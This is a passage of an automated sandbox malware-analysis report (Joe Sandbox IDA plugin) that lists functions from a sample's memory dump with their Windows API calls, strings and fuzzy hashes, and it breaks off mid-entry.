close PlayMe, xrefs: 00667B53, 00667B80
open , xrefs: 00667AF1
status PlayMe mode, xrefs: 00667B3D
play PlayMe, xrefs: 00667B87
alias PlayMe, xrefs: 00667B1B

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: df235194103938666c4c6f9bef7ef2fe970a81cee2740e2f5d12e51190f4b2a8
Instruction ID: 56c820bfa04a331d844c1577a8dd42fb608c9ef68f5d5f9e3c24c81a5518a473
Opcode Fuzzy Hash: df235194103938666c4c6f9bef7ef2fe970a81cee2740e2f5d12e51190f4b2a8
Instruction Fuzzy Hash: 371104B0A4067A79D720B761DC4ADFF7B7EEBD1B10F00042AB411A32C0DA700A44CAB5

Function 0066778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00667794

Part of subcall function 0063DC38: timeGetTime.WINMM(?,75A8B400,006958AB), ref: 0063DC3C

Sleep.KERNEL32(0000000A), ref: 006677C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 006677E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00667806
SetActiveWindow.USER32 ref: 00667825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00667833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00667852
Sleep.KERNEL32(000000FA), ref: 0066785D
IsWindow.USER32 ref: 00667869
EndDialog.USER32(00000000), ref: 0066787A

Strings

BUTTON, xrefs: 006677F8

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: ed6081eeacfa54dc8b60615c00d15c3d685071ed5b824cc7eef39f106c93d5e7
Instruction ID: 3b16a89a63d55d7e2808e5f6684b4973bde8d733d8168a9a3ad08c444b14d52d
Opcode Fuzzy Hash: ed6081eeacfa54dc8b60615c00d15c3d685071ed5b824cc7eef39f106c93d5e7
Instruction Fuzzy Hash: 362135B0214385BFE7006B20EC8DE6A3F6BFB05348F042068F50687762DB71AD00DE24

Function 006702EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF

CoInitialize.OLE32(00000000), ref: 0067034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006703DE
SHGetDesktopFolder.SHELL32(?), ref: 006703F2
CoCreateInstance.OLE32(006ADA8C,00000000,00000001,006D3CF8,?), ref: 0067043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006704AD
CoTaskMemFree.OLE32(?,?), ref: 00670505
_memset.LIBCMT ref: 00670542
SHBrowseForFolderW.SHELL32(?), ref: 0067057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006705A1
CoTaskMemFree.OLE32(00000000), ref: 006705A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006705DF
CoUninitialize.OLE32(00000001,00000000), ref: 006705E1

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 7027d3035c0ab489e8fed06774ac1a24082367240f879cc8da57426f504a1c0d
Instruction ID: dce620a16b3d37bae9312065482f8bc44ae26226e9af9fbc0f19a367bdd2e174
Opcode Fuzzy Hash: 7027d3035c0ab489e8fed06774ac1a24082367240f879cc8da57426f504a1c0d
Instruction Fuzzy Hash: 4CB1D975A00119EFDB04DFA4C988DAEBBBAEF48314B148499E90AEB251D730ED41CF64

Function 00662E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00662ED6
SetKeyboardState.USER32(?), ref: 00662F41
GetAsyncKeyState.USER32(000000A0), ref: 00662F61
GetKeyState.USER32(000000A0), ref: 00662F78
GetAsyncKeyState.USER32(000000A1), ref: 00662FA7
GetKeyState.USER32(000000A1), ref: 00662FB8
GetAsyncKeyState.USER32(00000011), ref: 00662FE4
GetKeyState.USER32(00000011), ref: 00662FF2
GetAsyncKeyState.USER32(00000012), ref: 0066301B
GetKeyState.USER32(00000012), ref: 00663029
GetAsyncKeyState.USER32(0000005B), ref: 00663052
GetKeyState.USER32(0000005B), ref: 00663060

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c4b2bc36d1866917d1f51e77ab9ce1ff08718cdeec4e864a8651f52918f1a36f
Instruction ID: b91ea79d6aa51e5f0edf46b33b47cebaaa074851cb076a0cfb8491a58c0820d4
Opcode Fuzzy Hash: c4b2bc36d1866917d1f51e77ab9ce1ff08718cdeec4e864a8651f52918f1a36f
Instruction Fuzzy Hash: B051FB20A04BD529FB35DBB489207EABFF65F12340F08459DC5C2563C2DA649B8CC7A6

Function 0065ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0065ED1E
GetWindowRect.USER32(00000000,?), ref: 0065ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0065ED8E
GetDlgItem.USER32(?,00000002), ref: 0065ED99
GetWindowRect.USER32(00000000,?), ref: 0065EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0065EE01
GetDlgItem.USER32(?,000003E9), ref: 0065EE0F
GetWindowRect.USER32(00000000,?), ref: 0065EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0065EE63
GetDlgItem.USER32(?,000003EA), ref: 0065EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0065EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 0065EE9B

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: f5504b7bdeb60e8a0032226fd7d1527afee342268a29f846f9ceec220721c960
Instruction ID: 4a8a14b34d8dfd325805e974f0af3365941c497ec5564403d31f836c4188ee09
Opcode Fuzzy Hash: f5504b7bdeb60e8a0032226fd7d1527afee342268a29f846f9ceec220721c960
Instruction Fuzzy Hash: 3B513371B00205AFDF18DF68DD85AAEBBB6FB89301F14912DF91AD7290D771AE048B10

Function 0063B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0063B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0063B759,?,00000000,?,?,?,?,0063B72B,00000000,?), ref: 0063BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0063B72B), ref: 0063B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0063B72B,00000000,?,?,0063B2EF,?,?), ref: 0063B88D
DestroyAcceleratorTable.USER32(00000000), ref: 0069D8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0063B72B,00000000,?,?,0063B2EF,?,?), ref: 0069D8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0063B72B,00000000,?,?,0063B2EF,?,?), ref: 0069D8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0063B72B,00000000,?,?,0063B2EF,?,?), ref: 0069D90A
DeleteObject.GDI32(00000000), ref: 0069D91C

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 1b7245c2de67fb1e5bc847d7422e7257a33955079c3745c429bedc3de01bc57a
Instruction ID: 5d5744b444b0af066195b816c7ecbf1b87d8c44838f6d056fcc4c062834dbdfa
Opcode Fuzzy Hash: 1b7245c2de67fb1e5bc847d7422e7257a33955079c3745c429bedc3de01bc57a
Instruction Fuzzy Hash: FC617B30501740DFDB25AF18D988BA5B7FBFF96316F14652DE2468AA60C770A881EF84

Function 0063B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0063B526: GetWindowLongW.USER32(?,000000EB), ref: 0063B537

GetSysColor.USER32(0000000F), ref: 0063B438

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 90bef84830d60550b9a4366cb2df3649bbfba2af97295350c335fb64db0dc0f9
Instruction ID: 3a80f4819ee71d3667896fcf39000d1f469fb8e8640ac49fd279c88f587c18d4
Opcode Fuzzy Hash: 90bef84830d60550b9a4366cb2df3649bbfba2af97295350c335fb64db0dc0f9
Instruction Fuzzy Hash: 5741B5301001449FDF246F28D889BF937A7AB06730F145265FE668E6EBD7319C42DBA5

Function 0066690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00666923
_wcscpy.LIBCMT ref: 00666934
__wsplitpath.LIBCMT ref: 00666958
__wsplitpath.LIBCMT ref: 00666979
_wcscpy.LIBCMT ref: 0066699B
_wcscpy.LIBCMT ref: 006669B9
_wcscpy.LIBCMT ref: 006669C7
_wcscat.LIBCMT ref: 006669D6
_wcscat.LIBCMT ref: 00666A2B
_wcscat.LIBCMT ref: 00666A61
_wcscat.LIBCMT ref: 00666A73

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 5c42bb9c9f3b368608b6c9efe265b9274ae361669c5593db7026a23b7921c74e
Instruction ID: aff50ba10d46e86c8a16c5d805fec35cad2f9f5c0c8481734af51a215099a7b0
Opcode Fuzzy Hash: 5c42bb9c9f3b368608b6c9efe265b9274ae361669c5593db7026a23b7921c74e
Instruction Fuzzy Hash: 4441127684512CAEDFA1DB94DC85DDF73BEEF44300F0041AAB659A2051EA30ABD98F54

Function 0066D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(006BDC00,006BDC00,006BDC00), ref: 0066D7CE
GetDriveTypeW.KERNEL32(?,006D3A70,00000061), ref: 0066D898
_wcscpy.LIBCMT ref: 0066D8C2

Strings

all, xrefs: 0066D7D4
removable, xrefs: 0066D800
network, xrefs: 0066D82C
fixed, xrefs: 0066D816
ramdisk, xrefs: 0066D842
cdrom, xrefs: 0066D7EA
unknown, xrefs: 0066D859

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: d45a2d029d3af9845f39fb04fc60927a085c660a4ac2ec0df03b1d147bacec6b
Instruction ID: 18da3fdfafee25e81f193af50b035bd839450e1aff0af62142e7211efd9000a9
Opcode Fuzzy Hash: d45a2d029d3af9845f39fb04fc60927a085c660a4ac2ec0df03b1d147bacec6b
Instruction Fuzzy Hash: CA51C731A04300AFC740EF14D891AAEB7A7EF94314F14992DF5AA573A2DB31ED05CB96

Function 0062936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 006293AB
__itow.LIBCMT ref: 006293DF

Part of subcall function 00641557: _xtow@16.LIBCMT ref: 00641578

Strings

%.15g, xrefs: 006293A5
False, xrefs: 00694C93
True, xrefs: 00694C8C
0x%p, xrefs: 00694CAD

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: ec7cc49bda9ab7a4e77eba028e51f91ea9d6a4b68009e454830444803ca7c0d5
Instruction ID: 59141d6b51dac739585cca02dd004e0e33cdef9f044e4e72a6a4a89e661e9e2f
Opcode Fuzzy Hash: ec7cc49bda9ab7a4e77eba028e51f91ea9d6a4b68009e454830444803ca7c0d5
Instruction Fuzzy Hash: 8941C571904614EFDB24DB74E941EAA73FAEF88350F20446EE149D7282EA319942CB65

Function 0068A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0068A259
CreateCompatibleDC.GDI32(00000000), ref: 0068A260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0068A273
SelectObject.GDI32(00000000,00000000), ref: 0068A27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0068A286
DeleteDC.GDI32(00000000), ref: 0068A28F
GetWindowLongW.USER32(?,000000EC), ref: 0068A299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0068A2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0068A2B9

Strings

static, xrefs: 0068A1F1

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 82c226813516dbf804ac34f39141f1854de5838aceaf1b8747a51a4f4179739b
Instruction ID: b1aa58ab382371084d6355d552a61bab63fb1bce3e5f0e18cb42dfe1556ac44b
Opcode Fuzzy Hash: 82c226813516dbf804ac34f39141f1854de5838aceaf1b8747a51a4f4179739b
Instruction Fuzzy Hash: 9F319231100115BBEF21AFA4DC49FDA3B6AFF0E360F141315F916961A0C731E811DB64

Function 00666F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00666F1D
gethostname.WSOCK32(?,00000100), ref: 00666F37
gethostbyname.WSOCK32(?), ref: 00666F44
_wcscpy.LIBCMT ref: 00666F6C
inet_ntoa.WSOCK32(?), ref: 00666F8A
_strcat.LIBCMT ref: 00666F98
_wcscpy.LIBCMT ref: 00666FAF
WSACleanup.WSOCK32 ref: 00666FBD
_wcscpy.LIBCMT ref: 00666FCB

Strings

0.0.0.0, xrefs: 00666F66

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 68ccef7f41a9ff3bee3d5892093c23294d8a8628f3c031ae6335bb958708dcfc
Instruction ID: aa21435735f192f4535eb597966d984d59fe3a2a6b1fd84e02f529f368f934d6
Opcode Fuzzy Hash: 68ccef7f41a9ff3bee3d5892093c23294d8a8628f3c031ae6335bb958708dcfc
Instruction Fuzzy Hash: 30110671904215AFDB24BB70FC0AEDA77AFEF41710F000069F106A6181FF70EA858B55

Function 0064500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00645047

Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E

__gmtime64_s.LIBCMT ref: 006450E0
__gmtime64_s.LIBCMT ref: 00645116
__gmtime64_s.LIBCMT ref: 00645133
__allrem.LIBCMT ref: 00645189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006451A5
__allrem.LIBCMT ref: 006451BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006451DA
__allrem.LIBCMT ref: 006451F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0064520F
__invoke_watson.LIBCMT ref: 00645280

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: bd29da6f4a3ef3adbbe531363105289fa7cbae70b787ff4c6b2a1a3e7c7a84fe
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 6C71FA75A00F17ABD714AE78CC41BAA73AAAF01764F14422EF912DB782E770DD4487D4

Function 00664DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00664DF8
GetMenuItemInfoW.USER32(006E1708,000000FF,00000000,00000030), ref: 00664E59
SetMenuItemInfoW.USER32(006E1708,00000004,00000000,00000030), ref: 00664E8F
Sleep.KERNEL32(000001F4), ref: 00664EA1
GetMenuItemCount.USER32(?), ref: 00664EE5
GetMenuItemID.USER32(?,00000000), ref: 00664F01
GetMenuItemID.USER32(?,-00000001), ref: 00664F2B
GetMenuItemID.USER32(?,?), ref: 00664F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00664FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00664FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00664FEB

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 7310ba7c53fb3c6c3947db626a977e10d3500518f93ec57b4205b8931ac849da
Instruction ID: 5052f37ba04244d27df0bfebfc7e6030d18e46f0c5b72452b327c53daffbfbbd
Opcode Fuzzy Hash: 7310ba7c53fb3c6c3947db626a977e10d3500518f93ec57b4205b8931ac849da
Instruction Fuzzy Hash: 936193B1900289AFDB61DFA4DC84DEE7BBAFB85304F144059F442A7251DB31AD45DB21

Function 00689C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00689C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00689C9B
GetWindowLongW.USER32(?,000000F0), ref: 00689CBF
_memset.LIBCMT ref: 00689CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00689CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00689D5A

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 76bb21c7c36b09ca3b1bda5a81d9b950f4892de440c25ab09d3f32441fb6f074
Instruction ID: 383047a701e47510afc90ef9b8b7ab08f219139fc5d1d55c8c2b3f649260003b
Opcode Fuzzy Hash: 76bb21c7c36b09ca3b1bda5a81d9b950f4892de440c25ab09d3f32441fb6f074
Instruction Fuzzy Hash: DF617B75900248AFDB11EFA8CC81EFE77B9EF09704F144259FA05AB2A1D770AD42DB64

Function 006594E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

